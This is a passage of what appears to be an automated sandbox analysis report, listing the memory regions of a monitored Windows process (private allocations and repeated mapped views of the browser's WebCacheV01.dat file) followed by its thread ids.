region_type = private name = "private_0x000001cd56210000" filename = "" Region: id = 753 start_va = 0x1cd56210000 end_va = 0x1cd56217fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56210000" filename = "" Region: id = 754 start_va = 0x1cd56210000 end_va = 0x1cd56217fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56210000" filename = "" Region: id = 755 start_va = 0x1cd56220000 end_va = 0x1cd56227fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56220000" filename = "" Region: id = 756 start_va = 0x1cd56230000 end_va = 0x1cd56237fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56230000" filename = "" Region: id = 757 start_va = 0x1cd56240000 end_va = 0x1cd56247fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56240000" filename = "" Region: id = 758 start_va = 0x1cd56250000 end_va = 0x1cd56257fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56250000" filename = "" Region: id = 759 start_va = 0x1cd56260000 end_va = 0x1cd56267fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56260000" filename = "" Region: id = 760 start_va = 0x1cd56270000 end_va = 0x1cd56277fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56270000" filename = "" Region: id = 761 start_va = 0x1cd56280000 end_va = 0x1cd56287fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56280000" filename = "" Region: id = 762 start_va = 0x1cd56290000 end_va = 0x1cd56297fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56290000" filename = "" Region: id = 763 start_va = 0x1cd562a0000 end_va = 0x1cd562a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562a0000" filename = "" Region: id = 764 start_va = 0x1cd562b0000 end_va = 0x1cd562b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562b0000" filename = "" Region: id = 765 start_va = 0x1cd562c0000 end_va = 0x1cd562c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562c0000" filename = "" Region: id = 766 start_va = 0x1cd562d0000 end_va = 0x1cd562d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562d0000" filename = "" Region: id = 767 start_va = 0x1cd562e0000 end_va = 0x1cd562e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562e0000" filename = "" Region: id = 768 start_va = 0x1cd562f0000 end_va = 0x1cd562f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd562f0000" filename = "" Region: id = 769 start_va = 0x1cd56300000 end_va = 0x1cd56300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56300000" filename = "" Region: id = 770 start_va = 0x1cd56300000 end_va = 0x1cd56300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56300000" filename = "" Region: id = 771 start_va = 0x1cd56300000 end_va = 0x1cd56307fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56300000" filename = "" Region: id = 772 start_va = 0x1cd56300000 end_va = 0x1cd56307fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56300000" filename = "" Region: id = 773 start_va = 0x1cd56310000 end_va = 0x1cd56317fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56310000" filename = "" Region: id = 774 start_va = 0x1cd56320000 end_va = 0x1cd56327fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56320000" filename = "" Region: id = 775 start_va = 0x1cd56330000 end_va = 0x1cd56337fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56330000" filename = "" Region: id = 776 start_va = 0x1cd56340000 end_va = 0x1cd56347fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56340000" filename = "" Region: id = 777 start_va = 0x1cd56350000 end_va = 0x1cd56357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56350000" filename = "" Region: id = 778 start_va = 0x1cd56360000 end_va = 0x1cd56367fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56360000" filename = "" Region: id = 779 start_va = 0x1cd56370000 end_va = 0x1cd56377fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56370000" filename = "" Region: id = 780 start_va = 0x1cd56380000 end_va = 0x1cd56387fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56380000" filename = "" Region: id = 781 start_va = 0x1cd56390000 end_va = 0x1cd56390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56390000" filename = "" Region: id = 782 start_va = 0x1cd56390000 end_va = 0x1cd56390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56390000" filename = "" Region: id = 783 start_va = 0x1cd56390000 end_va = 0x1cd56397fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56390000" filename = "" Region: id = 784 start_va = 0x1cd56390000 end_va = 0x1cd56397fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56390000" filename = "" Region: id = 785 start_va = 0x1cd563a0000 end_va = 0x1cd563a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563a0000" filename = "" Region: id = 786 start_va = 0x1cd563b0000 end_va = 0x1cd563b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563b0000" filename = "" Region: id = 787 start_va = 0x1cd563c0000 end_va = 0x1cd563c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd563c0000" filename = "" Region: id = 788 start_va = 0x1cd563d0000 end_va = 0x1cd563d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563d0000" filename = "" Region: id = 789 start_va = 0x1cd563c0000 end_va = 0x1cd563cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 790 start_va = 0x1cd56180000 end_va = 0x1cd5618ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 791 start_va = 0x1cd561a0000 end_va = 0x1cd561affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 792 start_va = 0x1cd561b0000 end_va = 0x1cd561bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 793 start_va = 0x1cd561c0000 end_va = 0x1cd561cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 794 start_va = 0x1cd561d0000 end_va = 0x1cd561dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 795 start_va = 0x1cd561e0000 end_va = 0x1cd561effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 796 start_va = 0x1cd561f0000 end_va = 0x1cd561fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 797 start_va = 0x1cd56200000 end_va = 0x1cd5620ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 798 start_va = 0x1cd56210000 end_va = 0x1cd5621ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 799 start_va = 0x1cd56220000 end_va = 0x1cd5622ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 800 start_va = 0x1cd56230000 end_va = 0x1cd5623ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 801 start_va = 0x1cd56240000 end_va = 0x1cd5624ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 802 start_va = 0x1cd56250000 end_va = 0x1cd5625ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 803 start_va = 0x1cd56260000 end_va = 0x1cd5626ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 804 start_va = 0x1cd56270000 end_va = 0x1cd5627ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 805 start_va = 0x1cd56280000 end_va = 0x1cd5628ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 806 start_va = 0x1cd56290000 end_va = 0x1cd5629ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 807 start_va = 0x1cd562a0000 end_va = 0x1cd562affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 808 start_va = 0x1cd562b0000 end_va = 0x1cd562bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 809 start_va = 0x1cd562c0000 end_va = 0x1cd562cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 810 start_va = 0x1cd562d0000 end_va = 0x1cd562dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 811 start_va = 0x1cd562e0000 end_va = 0x1cd562effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 812 start_va = 0x1cd56300000 end_va = 0x1cd5630ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 813 start_va = 0x1cd56310000 end_va = 0x1cd5631ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 814 start_va = 0x1cd56320000 end_va = 0x1cd5632ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 815 start_va = 0x1cd56330000 end_va = 0x1cd5633ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 816 start_va = 0x1cd56340000 end_va = 0x1cd5634ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 817 start_va = 0x1cd56350000 end_va = 0x1cd5635ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 818 start_va = 0x1cd56360000 end_va = 0x1cd5636ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 819 start_va = 0x1cd56370000 end_va = 0x1cd5637ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 820 start_va = 0x1cd56380000 end_va = 0x1cd5638ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 821 start_va = 0x1cd562f0000 end_va = 0x1cd562fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 822 start_va = 0x1cd563d0000 end_va = 0x1cd563dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 823 start_va = 0x1cd56390000 end_va = 0x1cd5639ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 824 start_va = 0x1cd563a0000 end_va = 0x1cd563affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 825 start_va = 0x1cd563b0000 end_va = 0x1cd563b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563b0000" filename = "" Region: id = 826 start_va = 0x1cd563e0000 end_va = 0x1cd563e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563e0000" filename = "" Region: id = 827 start_va = 0x1cd563b0000 end_va = 0x1cd563bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd563b0000" filename = "" Region: id = 828 start_va = 0x1cd563e0000 end_va = 0x1cd563effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 829 start_va = 0x1cd563f0000 end_va = 0x1cd563fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 830 start_va = 0x1cd56400000 end_va = 0x1cd5640ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 831 start_va = 0x1cd56410000 end_va = 0x1cd56410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56410000" filename = "" Region: id = 832 start_va = 0x1cd56420000 end_va = 0x1cd56427fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd56420000" filename = "" Region: id = 833 start_va = 0x1cd563e0000 end_va = 0x1cd563e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563e0000" filename = "" Region: id = 834 start_va = 0x1cd563f0000 end_va = 0x1cd563f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563f0000" filename = "" Region: id = 835 start_va = 0x1cd563e0000 end_va = 0x1cd563effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 836 start_va = 0x1cd563f0000 end_va = 0x1cd563f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563f0000" filename = "" Region: id = 837 start_va = 0x1cd563e0000 end_va = 0x1cd563e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563e0000" filename = "" Region: id = 838 start_va = 0x1cd563f0000 end_va = 0x1cd563f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd563f0000" filename = "" Thread: id = 13 os_tid = 0xcd0 Thread: id = 14 os_tid = 0x4a0 Thread: id = 15 os_tid = 0x9dc Thread: id = 16 os_tid = 0x9d4 Thread: id = 17 os_tid = 0x9b8 Thread: id = 18 os_tid = 0x9ac Thread: id = 19 os_tid = 0x9a0